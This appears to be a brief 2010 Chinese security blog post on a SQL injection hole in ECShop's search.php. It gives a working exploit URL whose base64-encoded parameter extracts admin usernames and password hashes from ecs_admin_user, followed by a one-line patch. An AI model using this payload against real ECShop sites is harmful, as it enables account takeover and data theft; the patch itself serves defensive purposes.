ECShop serch 注入bug

selmy 网络安全ECShop serch 注入bug已关闭评论155阅读模式

利用语句:

shop/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp

7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGF

sbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciX

CcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

解决方案
search.php
大概300 源
if (is_not_null($val) )
修改为
if (is_not_null($val) && is_numeric($key))

文章末尾固定信息
weinxin
我的微信
微信扫一扫
selmy
  • 本文由 发表于 2010年06月12日 17:11:25
  • 转载请务必保留本文链接:https://oldblog.t4x.org/2010/06/12/ecshop-serch-bug/